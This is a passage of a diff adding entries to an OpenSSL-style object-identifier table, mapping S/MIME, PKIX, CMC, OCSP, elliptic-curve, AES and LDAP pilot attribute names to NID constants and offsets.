+{"id-smime-mod-ets-eSigPolicy-97","id-smime-mod-ets-eSigPolicy-97",
+	NID_id_smime_mod_ets_eSigPolicy_97,11,&(lvalues[1272]),0},
+{"id-smime-ct-receipt","id-smime-ct-receipt",NID_id_smime_ct_receipt,
+	11,&(lvalues[1283]),0},
+{"id-smime-ct-authData","id-smime-ct-authData",
+	NID_id_smime_ct_authData,11,&(lvalues[1294]),0},
+{"id-smime-ct-publishCert","id-smime-ct-publishCert",
+	NID_id_smime_ct_publishCert,11,&(lvalues[1305]),0},
+{"id-smime-ct-TSTInfo","id-smime-ct-TSTInfo",NID_id_smime_ct_TSTInfo,
+	11,&(lvalues[1316]),0},
+{"id-smime-ct-TDTInfo","id-smime-ct-TDTInfo",NID_id_smime_ct_TDTInfo,
+	11,&(lvalues[1327]),0},
+{"id-smime-ct-contentInfo","id-smime-ct-contentInfo",
+	NID_id_smime_ct_contentInfo,11,&(lvalues[1338]),0},
+{"id-smime-ct-DVCSRequestData","id-smime-ct-DVCSRequestData",
+	NID_id_smime_ct_DVCSRequestData,11,&(lvalues[1349]),0},
+{"id-smime-ct-DVCSResponseData","id-smime-ct-DVCSResponseData",
+	NID_id_smime_ct_DVCSResponseData,11,&(lvalues[1360]),0},
+{"id-smime-aa-receiptRequest","id-smime-aa-receiptRequest",
+	NID_id_smime_aa_receiptRequest,11,&(lvalues[1371]),0},
+{"id-smime-aa-securityLabel","id-smime-aa-securityLabel",
+	NID_id_smime_aa_securityLabel,11,&(lvalues[1382]),0},
+{"id-smime-aa-mlExpandHistory","id-smime-aa-mlExpandHistory",
+	NID_id_smime_aa_mlExpandHistory,11,&(lvalues[1393]),0},
+{"id-smime-aa-contentHint","id-smime-aa-contentHint",
+	NID_id_smime_aa_contentHint,11,&(lvalues[1404]),0},
+{"id-smime-aa-msgSigDigest","id-smime-aa-msgSigDigest",
+	NID_id_smime_aa_msgSigDigest,11,&(lvalues[1415]),0},
+{"id-smime-aa-encapContentType","id-smime-aa-encapContentType",
+	NID_id_smime_aa_encapContentType,11,&(lvalues[1426]),0},
+{"id-smime-aa-contentIdentifier","id-smime-aa-contentIdentifier",
+	NID_id_smime_aa_contentIdentifier,11,&(lvalues[1437]),0},
+{"id-smime-aa-macValue","id-smime-aa-macValue",
+	NID_id_smime_aa_macValue,11,&(lvalues[1448]),0},
+{"id-smime-aa-equivalentLabels","id-smime-aa-equivalentLabels",
+	NID_id_smime_aa_equivalentLabels,11,&(lvalues[1459]),0},
+{"id-smime-aa-contentReference","id-smime-aa-contentReference",
+	NID_id_smime_aa_contentReference,11,&(lvalues[1470]),0},
+{"id-smime-aa-encrypKeyPref","id-smime-aa-encrypKeyPref",
+	NID_id_smime_aa_encrypKeyPref,11,&(lvalues[1481]),0},
+{"id-smime-aa-signingCertificate","id-smime-aa-signingCertificate",
+	NID_id_smime_aa_signingCertificate,11,&(lvalues[1492]),0},
+{"id-smime-aa-smimeEncryptCerts","id-smime-aa-smimeEncryptCerts",
+	NID_id_smime_aa_smimeEncryptCerts,11,&(lvalues[1503]),0},
+{"id-smime-aa-timeStampToken","id-smime-aa-timeStampToken",
+	NID_id_smime_aa_timeStampToken,11,&(lvalues[1514]),0},
+{"id-smime-aa-ets-sigPolicyId","id-smime-aa-ets-sigPolicyId",
+	NID_id_smime_aa_ets_sigPolicyId,11,&(lvalues[1525]),0},
+{"id-smime-aa-ets-commitmentType","id-smime-aa-ets-commitmentType",
+	NID_id_smime_aa_ets_commitmentType,11,&(lvalues[1536]),0},
+{"id-smime-aa-ets-signerLocation","id-smime-aa-ets-signerLocation",
+	NID_id_smime_aa_ets_signerLocation,11,&(lvalues[1547]),0},
+{"id-smime-aa-ets-signerAttr","id-smime-aa-ets-signerAttr",
+	NID_id_smime_aa_ets_signerAttr,11,&(lvalues[1558]),0},
+{"id-smime-aa-ets-otherSigCert","id-smime-aa-ets-otherSigCert",
+	NID_id_smime_aa_ets_otherSigCert,11,&(lvalues[1569]),0},
+{"id-smime-aa-ets-contentTimestamp",
+	"id-smime-aa-ets-contentTimestamp",
+	NID_id_smime_aa_ets_contentTimestamp,11,&(lvalues[1580]),0},
+{"id-smime-aa-ets-CertificateRefs","id-smime-aa-ets-CertificateRefs",
+	NID_id_smime_aa_ets_CertificateRefs,11,&(lvalues[1591]),0},
+{"id-smime-aa-ets-RevocationRefs","id-smime-aa-ets-RevocationRefs",
+	NID_id_smime_aa_ets_RevocationRefs,11,&(lvalues[1602]),0},
+{"id-smime-aa-ets-certValues","id-smime-aa-ets-certValues",
+	NID_id_smime_aa_ets_certValues,11,&(lvalues[1613]),0},
+{"id-smime-aa-ets-revocationValues",
+	"id-smime-aa-ets-revocationValues",
+	NID_id_smime_aa_ets_revocationValues,11,&(lvalues[1624]),0},
+{"id-smime-aa-ets-escTimeStamp","id-smime-aa-ets-escTimeStamp",
+	NID_id_smime_aa_ets_escTimeStamp,11,&(lvalues[1635]),0},
+{"id-smime-aa-ets-certCRLTimestamp",
+	"id-smime-aa-ets-certCRLTimestamp",
+	NID_id_smime_aa_ets_certCRLTimestamp,11,&(lvalues[1646]),0},
+{"id-smime-aa-ets-archiveTimeStamp",
+	"id-smime-aa-ets-archiveTimeStamp",
+	NID_id_smime_aa_ets_archiveTimeStamp,11,&(lvalues[1657]),0},
+{"id-smime-aa-signatureType","id-smime-aa-signatureType",
+	NID_id_smime_aa_signatureType,11,&(lvalues[1668]),0},
+{"id-smime-aa-dvcs-dvc","id-smime-aa-dvcs-dvc",
+	NID_id_smime_aa_dvcs_dvc,11,&(lvalues[1679]),0},
+{"id-smime-alg-ESDHwith3DES","id-smime-alg-ESDHwith3DES",
+	NID_id_smime_alg_ESDHwith3DES,11,&(lvalues[1690]),0},
+{"id-smime-alg-ESDHwithRC2","id-smime-alg-ESDHwithRC2",
+	NID_id_smime_alg_ESDHwithRC2,11,&(lvalues[1701]),0},
+{"id-smime-alg-3DESwrap","id-smime-alg-3DESwrap",
+	NID_id_smime_alg_3DESwrap,11,&(lvalues[1712]),0},
+{"id-smime-alg-RC2wrap","id-smime-alg-RC2wrap",
+	NID_id_smime_alg_RC2wrap,11,&(lvalues[1723]),0},
+{"id-smime-alg-ESDH","id-smime-alg-ESDH",NID_id_smime_alg_ESDH,11,
+	&(lvalues[1734]),0},
+{"id-smime-alg-CMS3DESwrap","id-smime-alg-CMS3DESwrap",
+	NID_id_smime_alg_CMS3DESwrap,11,&(lvalues[1745]),0},
+{"id-smime-alg-CMSRC2wrap","id-smime-alg-CMSRC2wrap",
+	NID_id_smime_alg_CMSRC2wrap,11,&(lvalues[1756]),0},
+{"id-smime-cd-ldap","id-smime-cd-ldap",NID_id_smime_cd_ldap,11,
+	&(lvalues[1767]),0},
+{"id-smime-spq-ets-sqt-uri","id-smime-spq-ets-sqt-uri",
+	NID_id_smime_spq_ets_sqt_uri,11,&(lvalues[1778]),0},
+{"id-smime-spq-ets-sqt-unotice","id-smime-spq-ets-sqt-unotice",
+	NID_id_smime_spq_ets_sqt_unotice,11,&(lvalues[1789]),0},
+{"id-smime-cti-ets-proofOfOrigin","id-smime-cti-ets-proofOfOrigin",
+	NID_id_smime_cti_ets_proofOfOrigin,11,&(lvalues[1800]),0},
+{"id-smime-cti-ets-proofOfReceipt","id-smime-cti-ets-proofOfReceipt",
+	NID_id_smime_cti_ets_proofOfReceipt,11,&(lvalues[1811]),0},
+{"id-smime-cti-ets-proofOfDelivery",
+	"id-smime-cti-ets-proofOfDelivery",
+	NID_id_smime_cti_ets_proofOfDelivery,11,&(lvalues[1822]),0},
+{"id-smime-cti-ets-proofOfSender","id-smime-cti-ets-proofOfSender",
+	NID_id_smime_cti_ets_proofOfSender,11,&(lvalues[1833]),0},
+{"id-smime-cti-ets-proofOfApproval",
+	"id-smime-cti-ets-proofOfApproval",
+	NID_id_smime_cti_ets_proofOfApproval,11,&(lvalues[1844]),0},
+{"id-smime-cti-ets-proofOfCreation",
+	"id-smime-cti-ets-proofOfCreation",
+	NID_id_smime_cti_ets_proofOfCreation,11,&(lvalues[1855]),0},
+{"MD4","md4",NID_md4,8,&(lvalues[1866]),0},
+{"id-pkix-mod","id-pkix-mod",NID_id_pkix_mod,7,&(lvalues[1874]),0},
+{"id-qt","id-qt",NID_id_qt,7,&(lvalues[1881]),0},
+{"id-it","id-it",NID_id_it,7,&(lvalues[1888]),0},
+{"id-pkip","id-pkip",NID_id_pkip,7,&(lvalues[1895]),0},
+{"id-alg","id-alg",NID_id_alg,7,&(lvalues[1902]),0},
+{"id-cmc","id-cmc",NID_id_cmc,7,&(lvalues[1909]),0},
+{"id-on","id-on",NID_id_on,7,&(lvalues[1916]),0},
+{"id-pda","id-pda",NID_id_pda,7,&(lvalues[1923]),0},
+{"id-aca","id-aca",NID_id_aca,7,&(lvalues[1930]),0},
+{"id-qcs","id-qcs",NID_id_qcs,7,&(lvalues[1937]),0},
+{"id-cct","id-cct",NID_id_cct,7,&(lvalues[1944]),0},
+{"id-pkix1-explicit-88","id-pkix1-explicit-88",
+	NID_id_pkix1_explicit_88,8,&(lvalues[1951]),0},
+{"id-pkix1-implicit-88","id-pkix1-implicit-88",
+	NID_id_pkix1_implicit_88,8,&(lvalues[1959]),0},
+{"id-pkix1-explicit-93","id-pkix1-explicit-93",
+	NID_id_pkix1_explicit_93,8,&(lvalues[1967]),0},
+{"id-pkix1-implicit-93","id-pkix1-implicit-93",
+	NID_id_pkix1_implicit_93,8,&(lvalues[1975]),0},
+{"id-mod-crmf","id-mod-crmf",NID_id_mod_crmf,8,&(lvalues[1983]),0},
+{"id-mod-cmc","id-mod-cmc",NID_id_mod_cmc,8,&(lvalues[1991]),0},
+{"id-mod-kea-profile-88","id-mod-kea-profile-88",
+	NID_id_mod_kea_profile_88,8,&(lvalues[1999]),0},
+{"id-mod-kea-profile-93","id-mod-kea-profile-93",
+	NID_id_mod_kea_profile_93,8,&(lvalues[2007]),0},
+{"id-mod-cmp","id-mod-cmp",NID_id_mod_cmp,8,&(lvalues[2015]),0},
+{"id-mod-qualified-cert-88","id-mod-qualified-cert-88",
+	NID_id_mod_qualified_cert_88,8,&(lvalues[2023]),0},
+{"id-mod-qualified-cert-93","id-mod-qualified-cert-93",
+	NID_id_mod_qualified_cert_93,8,&(lvalues[2031]),0},
+{"id-mod-attribute-cert","id-mod-attribute-cert",
+	NID_id_mod_attribute_cert,8,&(lvalues[2039]),0},
+{"id-mod-timestamp-protocol","id-mod-timestamp-protocol",
+	NID_id_mod_timestamp_protocol,8,&(lvalues[2047]),0},
+{"id-mod-ocsp","id-mod-ocsp",NID_id_mod_ocsp,8,&(lvalues[2055]),0},
+{"id-mod-dvcs","id-mod-dvcs",NID_id_mod_dvcs,8,&(lvalues[2063]),0},
+{"id-mod-cmp2000","id-mod-cmp2000",NID_id_mod_cmp2000,8,
+	&(lvalues[2071]),0},
+{"biometricInfo","Biometric Info",NID_biometricInfo,8,&(lvalues[2079]),0},
+{"qcStatements","qcStatements",NID_qcStatements,8,&(lvalues[2087]),0},
+{"ac-auditEntity","ac-auditEntity",NID_ac_auditEntity,8,
+	&(lvalues[2095]),0},
+{"ac-targeting","ac-targeting",NID_ac_targeting,8,&(lvalues[2103]),0},
+{"aaControls","aaControls",NID_aaControls,8,&(lvalues[2111]),0},
+{"sbgp-ipAddrBlock","sbgp-ipAddrBlock",NID_sbgp_ipAddrBlock,8,
+	&(lvalues[2119]),0},
+{"sbgp-autonomousSysNum","sbgp-autonomousSysNum",
+	NID_sbgp_autonomousSysNum,8,&(lvalues[2127]),0},
+{"sbgp-routerIdentifier","sbgp-routerIdentifier",
+	NID_sbgp_routerIdentifier,8,&(lvalues[2135]),0},
+{"textNotice","textNotice",NID_textNotice,8,&(lvalues[2143]),0},
+{"ipsecEndSystem","IPSec End System",NID_ipsecEndSystem,8,
+	&(lvalues[2151]),0},
+{"ipsecTunnel","IPSec Tunnel",NID_ipsecTunnel,8,&(lvalues[2159]),0},
+{"ipsecUser","IPSec User",NID_ipsecUser,8,&(lvalues[2167]),0},
+{"DVCS","dvcs",NID_dvcs,8,&(lvalues[2175]),0},
+{"id-it-caProtEncCert","id-it-caProtEncCert",NID_id_it_caProtEncCert,
+	8,&(lvalues[2183]),0},
+{"id-it-signKeyPairTypes","id-it-signKeyPairTypes",
+	NID_id_it_signKeyPairTypes,8,&(lvalues[2191]),0},
+{"id-it-encKeyPairTypes","id-it-encKeyPairTypes",
+	NID_id_it_encKeyPairTypes,8,&(lvalues[2199]),0},
+{"id-it-preferredSymmAlg","id-it-preferredSymmAlg",
+	NID_id_it_preferredSymmAlg,8,&(lvalues[2207]),0},
+{"id-it-caKeyUpdateInfo","id-it-caKeyUpdateInfo",
+	NID_id_it_caKeyUpdateInfo,8,&(lvalues[2215]),0},
+{"id-it-currentCRL","id-it-currentCRL",NID_id_it_currentCRL,8,
+	&(lvalues[2223]),0},
+{"id-it-unsupportedOIDs","id-it-unsupportedOIDs",
+	NID_id_it_unsupportedOIDs,8,&(lvalues[2231]),0},
+{"id-it-subscriptionRequest","id-it-subscriptionRequest",
+	NID_id_it_subscriptionRequest,8,&(lvalues[2239]),0},
+{"id-it-subscriptionResponse","id-it-subscriptionResponse",
+	NID_id_it_subscriptionResponse,8,&(lvalues[2247]),0},
+{"id-it-keyPairParamReq","id-it-keyPairParamReq",
+	NID_id_it_keyPairParamReq,8,&(lvalues[2255]),0},
+{"id-it-keyPairParamRep","id-it-keyPairParamRep",
+	NID_id_it_keyPairParamRep,8,&(lvalues[2263]),0},
+{"id-it-revPassphrase","id-it-revPassphrase",NID_id_it_revPassphrase,
+	8,&(lvalues[2271]),0},
+{"id-it-implicitConfirm","id-it-implicitConfirm",
+	NID_id_it_implicitConfirm,8,&(lvalues[2279]),0},
+{"id-it-confirmWaitTime","id-it-confirmWaitTime",
+	NID_id_it_confirmWaitTime,8,&(lvalues[2287]),0},
+{"id-it-origPKIMessage","id-it-origPKIMessage",
+	NID_id_it_origPKIMessage,8,&(lvalues[2295]),0},
+{"id-regCtrl","id-regCtrl",NID_id_regCtrl,8,&(lvalues[2303]),0},
+{"id-regInfo","id-regInfo",NID_id_regInfo,8,&(lvalues[2311]),0},
+{"id-regCtrl-regToken","id-regCtrl-regToken",NID_id_regCtrl_regToken,
+	9,&(lvalues[2319]),0},
+{"id-regCtrl-authenticator","id-regCtrl-authenticator",
+	NID_id_regCtrl_authenticator,9,&(lvalues[2328]),0},
+{"id-regCtrl-pkiPublicationInfo","id-regCtrl-pkiPublicationInfo",
+	NID_id_regCtrl_pkiPublicationInfo,9,&(lvalues[2337]),0},
+{"id-regCtrl-pkiArchiveOptions","id-regCtrl-pkiArchiveOptions",
+	NID_id_regCtrl_pkiArchiveOptions,9,&(lvalues[2346]),0},
+{"id-regCtrl-oldCertID","id-regCtrl-oldCertID",
+	NID_id_regCtrl_oldCertID,9,&(lvalues[2355]),0},
+{"id-regCtrl-protocolEncrKey","id-regCtrl-protocolEncrKey",
+	NID_id_regCtrl_protocolEncrKey,9,&(lvalues[2364]),0},
+{"id-regInfo-utf8Pairs","id-regInfo-utf8Pairs",
+	NID_id_regInfo_utf8Pairs,9,&(lvalues[2373]),0},
+{"id-regInfo-certReq","id-regInfo-certReq",NID_id_regInfo_certReq,9,
+	&(lvalues[2382]),0},
+{"id-alg-des40","id-alg-des40",NID_id_alg_des40,8,&(lvalues[2391]),0},
+{"id-alg-noSignature","id-alg-noSignature",NID_id_alg_noSignature,8,
+	&(lvalues[2399]),0},
+{"id-alg-dh-sig-hmac-sha1","id-alg-dh-sig-hmac-sha1",
+	NID_id_alg_dh_sig_hmac_sha1,8,&(lvalues[2407]),0},
+{"id-alg-dh-pop","id-alg-dh-pop",NID_id_alg_dh_pop,8,&(lvalues[2415]),0},
+{"id-cmc-statusInfo","id-cmc-statusInfo",NID_id_cmc_statusInfo,8,
+	&(lvalues[2423]),0},
+{"id-cmc-identification","id-cmc-identification",
+	NID_id_cmc_identification,8,&(lvalues[2431]),0},
+{"id-cmc-identityProof","id-cmc-identityProof",
+	NID_id_cmc_identityProof,8,&(lvalues[2439]),0},
+{"id-cmc-dataReturn","id-cmc-dataReturn",NID_id_cmc_dataReturn,8,
+	&(lvalues[2447]),0},
+{"id-cmc-transactionId","id-cmc-transactionId",
+	NID_id_cmc_transactionId,8,&(lvalues[2455]),0},
+{"id-cmc-senderNonce","id-cmc-senderNonce",NID_id_cmc_senderNonce,8,
+	&(lvalues[2463]),0},
+{"id-cmc-recipientNonce","id-cmc-recipientNonce",
+	NID_id_cmc_recipientNonce,8,&(lvalues[2471]),0},
+{"id-cmc-addExtensions","id-cmc-addExtensions",
+	NID_id_cmc_addExtensions,8,&(lvalues[2479]),0},
+{"id-cmc-encryptedPOP","id-cmc-encryptedPOP",NID_id_cmc_encryptedPOP,
+	8,&(lvalues[2487]),0},
+{"id-cmc-decryptedPOP","id-cmc-decryptedPOP",NID_id_cmc_decryptedPOP,
+	8,&(lvalues[2495]),0},
+{"id-cmc-lraPOPWitness","id-cmc-lraPOPWitness",
+	NID_id_cmc_lraPOPWitness,8,&(lvalues[2503]),0},
+{"id-cmc-getCert","id-cmc-getCert",NID_id_cmc_getCert,8,
+	&(lvalues[2511]),0},
+{"id-cmc-getCRL","id-cmc-getCRL",NID_id_cmc_getCRL,8,&(lvalues[2519]),0},
+{"id-cmc-revokeRequest","id-cmc-revokeRequest",
+	NID_id_cmc_revokeRequest,8,&(lvalues[2527]),0},
+{"id-cmc-regInfo","id-cmc-regInfo",NID_id_cmc_regInfo,8,
+	&(lvalues[2535]),0},
+{"id-cmc-responseInfo","id-cmc-responseInfo",NID_id_cmc_responseInfo,
+	8,&(lvalues[2543]),0},
+{"id-cmc-queryPending","id-cmc-queryPending",NID_id_cmc_queryPending,
+	8,&(lvalues[2551]),0},
+{"id-cmc-popLinkRandom","id-cmc-popLinkRandom",
+	NID_id_cmc_popLinkRandom,8,&(lvalues[2559]),0},
+{"id-cmc-popLinkWitness","id-cmc-popLinkWitness",
+	NID_id_cmc_popLinkWitness,8,&(lvalues[2567]),0},
+{"id-cmc-confirmCertAcceptance","id-cmc-confirmCertAcceptance",
+	NID_id_cmc_confirmCertAcceptance,8,&(lvalues[2575]),0},
+{"id-on-personalData","id-on-personalData",NID_id_on_personalData,8,
+	&(lvalues[2583]),0},
+{"id-pda-dateOfBirth","id-pda-dateOfBirth",NID_id_pda_dateOfBirth,8,
+	&(lvalues[2591]),0},
+{"id-pda-placeOfBirth","id-pda-placeOfBirth",NID_id_pda_placeOfBirth,
+	8,&(lvalues[2599]),0},
+{NULL,NULL,NID_undef,0,NULL,0},
+{"id-pda-gender","id-pda-gender",NID_id_pda_gender,8,&(lvalues[2607]),0},
+{"id-pda-countryOfCitizenship","id-pda-countryOfCitizenship",
+	NID_id_pda_countryOfCitizenship,8,&(lvalues[2615]),0},
+{"id-pda-countryOfResidence","id-pda-countryOfResidence",
+	NID_id_pda_countryOfResidence,8,&(lvalues[2623]),0},
+{"id-aca-authenticationInfo","id-aca-authenticationInfo",
+	NID_id_aca_authenticationInfo,8,&(lvalues[2631]),0},
+{"id-aca-accessIdentity","id-aca-accessIdentity",
+	NID_id_aca_accessIdentity,8,&(lvalues[2639]),0},
+{"id-aca-chargingIdentity","id-aca-chargingIdentity",
+	NID_id_aca_chargingIdentity,8,&(lvalues[2647]),0},
+{"id-aca-group","id-aca-group",NID_id_aca_group,8,&(lvalues[2655]),0},
+{"id-aca-role","id-aca-role",NID_id_aca_role,8,&(lvalues[2663]),0},
+{"id-qcs-pkixQCSyntax-v1","id-qcs-pkixQCSyntax-v1",
+	NID_id_qcs_pkixQCSyntax_v1,8,&(lvalues[2671]),0},
+{"id-cct-crs","id-cct-crs",NID_id_cct_crs,8,&(lvalues[2679]),0},
+{"id-cct-PKIData","id-cct-PKIData",NID_id_cct_PKIData,8,
+	&(lvalues[2687]),0},
+{"id-cct-PKIResponse","id-cct-PKIResponse",NID_id_cct_PKIResponse,8,
+	&(lvalues[2695]),0},
+{"ad_timestamping","AD Time Stamping",NID_ad_timeStamping,8,
+	&(lvalues[2703]),0},
+{"AD_DVCS","ad dvcs",NID_ad_dvcs,8,&(lvalues[2711]),0},
+{"basicOCSPResponse","Basic OCSP Response",NID_id_pkix_OCSP_basic,9,
+	&(lvalues[2719]),0},
+{"Nonce","OCSP Nonce",NID_id_pkix_OCSP_Nonce,9,&(lvalues[2728]),0},
+{"CrlID","OCSP CRL ID",NID_id_pkix_OCSP_CrlID,9,&(lvalues[2737]),0},
+{"acceptableResponses","Acceptable OCSP Responses",
+	NID_id_pkix_OCSP_acceptableResponses,9,&(lvalues[2746]),0},
+{"noCheck","OCSP No Check",NID_id_pkix_OCSP_noCheck,9,&(lvalues[2755]),0},
+{"archiveCutoff","OCSP Archive Cutoff",NID_id_pkix_OCSP_archiveCutoff,
+	9,&(lvalues[2764]),0},
+{"serviceLocator","OCSP Service Locator",
+	NID_id_pkix_OCSP_serviceLocator,9,&(lvalues[2773]),0},
+{"extendedStatus","Extended OCSP Status",
+	NID_id_pkix_OCSP_extendedStatus,9,&(lvalues[2782]),0},
+{"valid","valid",NID_id_pkix_OCSP_valid,9,&(lvalues[2791]),0},
+{"path","path",NID_id_pkix_OCSP_path,9,&(lvalues[2800]),0},
+{"trustRoot","Trust Root",NID_id_pkix_OCSP_trustRoot,9,
+	&(lvalues[2809]),0},
+{"algorithm","algorithm",NID_algorithm,4,&(lvalues[2818]),0},
+{"rsaSignature","rsaSignature",NID_rsaSignature,5,&(lvalues[2822]),0},
+{"X500algorithms","directory services - algorithms",
+	NID_X500algorithms,2,&(lvalues[2827]),0},
+{"ORG","org",NID_org,1,&(lvalues[2829]),0},
+{"DOD","dod",NID_dod,2,&(lvalues[2830]),0},
+{"IANA","iana",NID_iana,3,&(lvalues[2832]),0},
+{"directory","Directory",NID_Directory,4,&(lvalues[2835]),0},
+{"mgmt","Management",NID_Management,4,&(lvalues[2839]),0},
+{"experimental","Experimental",NID_Experimental,4,&(lvalues[2843]),0},
+{"private","Private",NID_Private,4,&(lvalues[2847]),0},
+{"security","Security",NID_Security,4,&(lvalues[2851]),0},
+{"snmpv2","SNMPv2",NID_SNMPv2,4,&(lvalues[2855]),0},
+{"Mail","Mail",NID_Mail,4,&(lvalues[2859]),0},
+{"enterprises","Enterprises",NID_Enterprises,5,&(lvalues[2863]),0},
+{"dcobject","dcObject",NID_dcObject,9,&(lvalues[2868]),0},
+{"DC","domainComponent",NID_domainComponent,10,&(lvalues[2877]),0},
+{"domain","Domain",NID_Domain,10,&(lvalues[2887]),0},
+{"NULL","NULL",NID_joint_iso_ccitt,0,NULL,0},
+{"selected-attribute-types","Selected Attribute Types",
+	NID_selected_attribute_types,3,&(lvalues[2897]),0},
+{"clearance","clearance",NID_clearance,4,&(lvalues[2900]),0},
+{"RSA-MD4","md4WithRSAEncryption",NID_md4WithRSAEncryption,9,
+	&(lvalues[2904]),0},
+{"ac-proxying","ac-proxying",NID_ac_proxying,8,&(lvalues[2913]),0},
+{"subjectInfoAccess","Subject Information Access",NID_sinfo_access,8,
+	&(lvalues[2921]),0},
+{"id-aca-encAttrs","id-aca-encAttrs",NID_id_aca_encAttrs,8,
+	&(lvalues[2929]),0},
+{"role","role",NID_role,3,&(lvalues[2937]),0},
+{"policyConstraints","X509v3 Policy Constraints",
+	NID_policy_constraints,3,&(lvalues[2940]),0},
+{"targetInformation","X509v3 AC Targeting",NID_target_information,3,
+	&(lvalues[2943]),0},
+{"noRevAvail","X509v3 No Revocation Available",NID_no_rev_avail,3,
+	&(lvalues[2946]),0},
+{"NULL","NULL",NID_ccitt,0,NULL,0},
+{"ansi-X9-62","ANSI X9.62",NID_ansi_X9_62,5,&(lvalues[2949]),0},
+{"prime-field","prime-field",NID_X9_62_prime_field,7,&(lvalues[2954]),0},
+{"characteristic-two-field","characteristic-two-field",
+	NID_X9_62_characteristic_two_field,7,&(lvalues[2961]),0},
+{"id-ecPublicKey","id-ecPublicKey",NID_X9_62_id_ecPublicKey,7,
+	&(lvalues[2968]),0},
+{"prime192v1","prime192v1",NID_X9_62_prime192v1,8,&(lvalues[2975]),0},
+{"prime192v2","prime192v2",NID_X9_62_prime192v2,8,&(lvalues[2983]),0},
+{"prime192v3","prime192v3",NID_X9_62_prime192v3,8,&(lvalues[2991]),0},
+{"prime239v1","prime239v1",NID_X9_62_prime239v1,8,&(lvalues[2999]),0},
+{"prime239v2","prime239v2",NID_X9_62_prime239v2,8,&(lvalues[3007]),0},
+{"prime239v3","prime239v3",NID_X9_62_prime239v3,8,&(lvalues[3015]),0},
+{"prime256v1","prime256v1",NID_X9_62_prime256v1,8,&(lvalues[3023]),0},
+{"ecdsa-with-SHA1","ecdsa-with-SHA1",NID_ecdsa_with_SHA1,7,
+	&(lvalues[3031]),0},
+{"CSPName","Microsoft CSP Name",NID_ms_csp_name,9,&(lvalues[3038]),0},
+{"AES-128-ECB","aes-128-ecb",NID_aes_128_ecb,9,&(lvalues[3047]),0},
+{"AES-128-CBC","aes-128-cbc",NID_aes_128_cbc,9,&(lvalues[3056]),0},
+{"AES-128-OFB","aes-128-ofb",NID_aes_128_ofb128,9,&(lvalues[3065]),0},
+{"AES-128-CFB","aes-128-cfb",NID_aes_128_cfb128,9,&(lvalues[3074]),0},
+{"AES-192-ECB","aes-192-ecb",NID_aes_192_ecb,9,&(lvalues[3083]),0},
+{"AES-192-CBC","aes-192-cbc",NID_aes_192_cbc,9,&(lvalues[3092]),0},
+{"AES-192-OFB","aes-192-ofb",NID_aes_192_ofb128,9,&(lvalues[3101]),0},
+{"AES-192-CFB","aes-192-cfb",NID_aes_192_cfb128,9,&(lvalues[3110]),0},
+{"AES-256-ECB","aes-256-ecb",NID_aes_256_ecb,9,&(lvalues[3119]),0},
+{"AES-256-CBC","aes-256-cbc",NID_aes_256_cbc,9,&(lvalues[3128]),0},
+{"AES-256-OFB","aes-256-ofb",NID_aes_256_ofb128,9,&(lvalues[3137]),0},
+{"AES-256-CFB","aes-256-cfb",NID_aes_256_cfb128,9,&(lvalues[3146]),0},
+{"holdInstructionCode","Hold Instruction Code",
+	NID_hold_instruction_code,3,&(lvalues[3155]),0},
+{"holdInstructionNone","Hold Instruction None",
+	NID_hold_instruction_none,7,&(lvalues[3158]),0},
+{"holdInstructionCallIssuer","Hold Instruction Call Issuer",
+	NID_hold_instruction_call_issuer,7,&(lvalues[3165]),0},
+{"holdInstructionReject","Hold Instruction Reject",
+	NID_hold_instruction_reject,7,&(lvalues[3172]),0},
+{"data","data",NID_data,1,&(lvalues[3179]),0},
+{"pss","pss",NID_pss,3,&(lvalues[3180]),0},
+{"ucl","ucl",NID_ucl,7,&(lvalues[3183]),0},
+{"pilot","pilot",NID_pilot,8,&(lvalues[3190]),0},
+{"pilotAttributeType","pilotAttributeType",NID_pilotAttributeType,9,
+	&(lvalues[3198]),0},
+{"pilotAttributeSyntax","pilotAttributeSyntax",
+	NID_pilotAttributeSyntax,9,&(lvalues[3207]),0},
+{"pilotObjectClass","pilotObjectClass",NID_pilotObjectClass,9,
+	&(lvalues[3216]),0},
+{"pilotGroups","pilotGroups",NID_pilotGroups,9,&(lvalues[3225]),0},
+{"iA5StringSyntax","iA5StringSyntax",NID_iA5StringSyntax,10,
+	&(lvalues[3234]),0},
+{"caseIgnoreIA5StringSyntax","caseIgnoreIA5StringSyntax",
+	NID_caseIgnoreIA5StringSyntax,10,&(lvalues[3244]),0},
+{"pilotObject","pilotObject",NID_pilotObject,10,&(lvalues[3254]),0},
+{"pilotPerson","pilotPerson",NID_pilotPerson,10,&(lvalues[3264]),0},
+{"account","account",NID_account,10,&(lvalues[3274]),0},
+{"document","document",NID_document,10,&(lvalues[3284]),0},
+{"room","room",NID_room,10,&(lvalues[3294]),0},
+{"documentSeries","documentSeries",NID_documentSeries,10,
+	&(lvalues[3304]),0},
+{"rFC822localPart","rFC822localPart",NID_rFC822localPart,10,
+	&(lvalues[3314]),0},
+{"dNSDomain","dNSDomain",NID_dNSDomain,10,&(lvalues[3324]),0},
+{"domainRelatedObject","domainRelatedObject",NID_domainRelatedObject,
+	10,&(lvalues[3334]),0},
+{"friendlyCountry","friendlyCountry",NID_friendlyCountry,10,
+	&(lvalues[3344]),0},
+{"simpleSecurityObject","simpleSecurityObject",
+	NID_simpleSecurityObject,10,&(lvalues[3354]),0},
+{"pilotOrganization","pilotOrganization",NID_pilotOrganization,10,
+	&(lvalues[3364]),0},
+{"pilotDSA","pilotDSA",NID_pilotDSA,10,&(lvalues[3374]),0},
+{"qualityLabelledData","qualityLabelledData",NID_qualityLabelledData,
+	10,&(lvalues[3384]),0},
+{"UID","userId",NID_userId,10,&(lvalues[3394]),0},
+{"textEncodedORAddress","textEncodedORAddress",
+	NID_textEncodedORAddress,10,&(lvalues[3404]),0},
+{"mail","rfc822Mailbox",NID_rfc822Mailbox,10,&(lvalues[3414]),0},
+{"info","info",NID_info,10,&(lvalues[3424]),0},
+{"favouriteDrink","favouriteDrink",NID_favouriteDrink,10,
+	&(lvalues[3434]),0},
+{"roomNumber","roomNumber",NID_roomNumber,10,&(lvalues[3444]),0},
+{"photo","photo",NID_photo,10,&(lvalues[3454]),0},
+{"userClass","userClass",NID_userClass,10,&(lvalues[3464]),0},
+{"host","host",NID_host,10,&(lvalues[3474]),0},
+{"manager","manager",NID_manager,10,&(lvalues[3484]),0},
+{"documentIdentifier","documentIdentifier",NID_documentIdentifier,10,
+	&(lvalues[3494]),0},
+{"documentTitle","documentTitle",NID_documentTitle,10,&(lvalues[3504]),0},
+{"documentVersion","documentVersion",NID_documentVersion,10,
+	&(lvalues[3514]),0},
+{"documentAuthor","documentAuthor",NID_documentAuthor,10,
+	&(lvalues[3524]),0},
